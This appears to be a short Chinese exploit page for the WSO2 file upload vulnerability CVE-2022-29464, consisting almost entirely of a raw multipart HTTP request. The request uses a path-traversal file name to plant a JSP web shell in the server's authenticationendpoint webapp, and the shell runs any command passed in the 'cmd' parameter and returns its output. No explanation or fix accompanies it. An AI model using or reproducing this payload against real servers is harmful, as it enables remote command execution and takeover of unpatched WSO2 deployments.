Close

7 6 月, 2024

(CVE-2022-29464)

WSO2 文件上传漏洞(CVE-2022-29464)

User-Agent: python-requests/2.22.0
Content-Type: multipart/form-data; boundary=4ef9f369a86bfaadf5ec3177278d49c0

--4ef9f369a86bfaadf5ec3177278d49c0
Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/1.jsp"; filename="../../../../repository/deployment/server/webapps/authenticationendpoint/1.jsp"
<FORM><INPUT name='cmd' type=text><INPUT type=submit value='Run'></FORM>
<%@ page import="java.io.*" %>
    <%
    String cmd = request.getParameter("cmd");String output = "";
    if(cmd != null) {String s = null;
        try {Process p = Runtime.getRuntime().exec(cmd,null,null);BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
            while((s = sI.readLine()) != null) { output += s+"</br>"; } }  catch(IOException e) {   e.printStackTrace();   } }
%><pre><%=output %></pre>
--4ef9f369a86bfaadf5ec3177278d49c0--